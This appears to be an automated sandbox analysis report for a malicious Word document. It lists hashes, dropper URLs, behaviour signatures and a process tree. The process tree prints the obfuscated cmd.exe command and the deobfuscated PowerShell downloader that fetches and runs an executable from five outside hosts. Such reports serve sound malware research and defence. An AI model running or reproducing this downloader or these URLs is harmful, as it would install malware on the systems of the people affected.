Overview

overview

10

Static

static

8

0037e60790...18.doc

windows7_x64

10

0037e60790...18.doc

windows10-2004_x64

10

Analysis

  • max time kernel
    107s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    16-05-2022 20:57

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    0037e6079060778b28b892eb8dcca7e28ca36f26a4f36d8dc53838d6d722b318.doc

  • Size

    124KB

  • MD5

    b6e13c6a1d437ed02509be01dd334983

  • SHA1

    a12ee91c820278590d58f0f846067992c1aa1053

  • SHA256

    0037e6079060778b28b892eb8dcca7e28ca36f26a4f36d8dc53838d6d722b318

  • SHA512

    8bfc1ffaaa45a8d7f6add5c51e7d1e8e62c95b71b7f76905e3a497f9957227991cd7eef477bc073483d375a3dadaef46d2d7e7376ed170a636fcd194b5836cba

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://www.novasystemsindustria.eu/cJcton
exe.dropper

http://velvet.com.br/2T6r4fYa
exe.dropper

http://www.batikentemlak.org/dEXSJO5y
exe.dropper

http://tongkhosoncongnghiep.com/DiJuOX
exe.dropper

http://www.fibraoptica.ro/8fG

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 4 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\0037e6079060778b28b892eb8dcca7e28ca36f26a4f36d8dc53838d6d722b318.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3068
    • C:\Windows\SYSTEM32\CMd.exe
      CMd \/ // //// / \ / /V:O/C"set ]}*~=027a 072a 07a2 0a72 207a 2a70 0a72 270a 72a0 7a02 a027 a207 02a7 a702 720a 7a02 72a0 7a02}207a}a072{027aha270ca720t720aaa702c20a7}720a;027ak2a07aa702e072ar7a02b270a;a720J20a7i0a72W27a0$207a 20a7ma270e2a07ta027I70a2-07a2e270ak072ao20a7va702n20a7I072a;07a2)20a7J2a70ia720W702a$7a02 27a0,20a7Ta027D02a7v70a2$a072(20a7e027al72a0ia270F072ad70a2a7a02oa702l2a70n27a0w702aoa702Da207.a207C0a27T207ar27a0$a027{7a20y270ar2a70t0a27{2a07)a270N2a70K20a7ra072$a072 70a2n27a0i0a72 720aT0a72Da207v720a$a702(a702h207ac027aa27a0e0a27ra027o7a20f27a0;2a70'702ae0a27x27a0ea270.a270'7a02+0a27i0a27z072aia207$2a07+02a7'20a7\072a'702a+72a0ca072i072al720ab027au2a07p02a7:27a0va702n702ae70a2$2a07=7a02J027ai0a27Wa702$2a07;2a70'70a262a7052a071a270'207a 07a2=a270 02a7ia027za270ia207$027a;a270)2a70'a027@0a27'7a20(20a7t2a07ia072l072ap2a07S072a.7a02'7a02G072af270a82a70/a270o70a2r0a72.702aa07a2c20a7i20a7t07a2pa702o72a0a720ar2a07b20a7i2a70f7a20.2a70wa027w20a7w20a7/02a7/02a7:0a72pa720ta720ta270h720a@072aX072aOa027ua702J72a0i2a70D27a0/0a72ma072o207aca270.072apa207e7a20i20a7h027ag027an7a02g027an027ao7a20c70a2n0a27o0a27sa027o2a70ha270k072ag027an2a70o702ata072/027a/02a7:0a27pa207t702at27a0h7a02@20a7y027a507a2O72a0Ja720S702aX20a7E7a02da207/72a0ga072r072aoa702.70a2k2a07a72a0l072am072ae270ata702n720ae72a0k072aia072t27a0a20a7b702a.2a70w7a20w07a2w02a7/720a/7a02:07a2p07a2t07a2t720ah20a7@720aaa270Y072af27a0470a2ra0276a270T7a02227a0/2a07r2a70b270a.a270ma072oa207c027a.027at07a2ea027v7a20l20a7e7a20v72a0/027a/720a:0a72p072at0a72ta072ha720@072ana072o207ata072ca720Ja027c2a70/207au7a20e072a.a027a02a7i20a7r702at27a0s0a72u72a0d7a02na270i7a20s702am027aea072t270as0a72ya270sa027a7a20va027oa207n72a0.702aw0a27w027awa270/20a7/720a:72a0pa720t207at2a07h7a20'70a2=2a07N0a27K027ar0a72$7a02;a720ta207n0a72e2a07i70a2l0a27C720aba270e072aW207a.2a07t02a7e27a0N0a27 207at072ac027ae7a20j72a0ba720oa072-a207wa702e207an0a72=702aC20a7T0a72r072a$270a a207l207al2a07e02a7ha702s7a02r20a7ea270wa270oa720p&&for /L %g in (1944,-5,4)do set .#=!.#!!]}*~:~%g,1!&&if %g leq 4 call %.#:~-389%"
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1160
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell $rTC=new-object Net.WebClient;$rKN='http://www.novasystemsindustria.eu/cJcton@http://velvet.com.br/2T6r4fYa@http://www.batikentemlak.org/dEXSJO5y@http://tongkhosoncongnghiep.com/DiJuOX@http://www.fibraoptica.ro/8fG'.Split('@');$izi = '156';$WiJ=$env:public+'\'+$izi+'.exe';foreach($vDT in $rKN){try{$rTC.DownloadFile($vDT, $WiJ);Invoke-Item $WiJ;break;}catch{}}
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2392

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2392-140-0x00007FFB47B80000-0x00007FFB48641000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/2392-139-0x000001E5A6E30000-0x000001E5A6E52000-memory.dmp

    Filesize

    136KB

    Download

  • memory/3068-133-0x00007FFB345B0000-0x00007FFB345C0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/3068-135-0x00007FFB31F80000-0x00007FFB31F90000-memory.dmp

    Filesize

    64KB

    Download

  • memory/3068-136-0x00007FFB31F80000-0x00007FFB31F90000-memory.dmp

    Filesize

    64KB

    Download

  • memory/3068-134-0x00007FFB345B0000-0x00007FFB345C0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/3068-130-0x00007FFB345B0000-0x00007FFB345C0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/3068-132-0x00007FFB345B0000-0x00007FFB345C0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/3068-131-0x00007FFB345B0000-0x00007FFB345C0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/3068-142-0x00007FFB345B0000-0x00007FFB345C0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/3068-143-0x00007FFB345B0000-0x00007FFB345C0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/3068-144-0x00007FFB345B0000-0x00007FFB345C0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/3068-145-0x00007FFB345B0000-0x00007FFB345C0000-memory.dmp

    Filesize

    64KB

    Download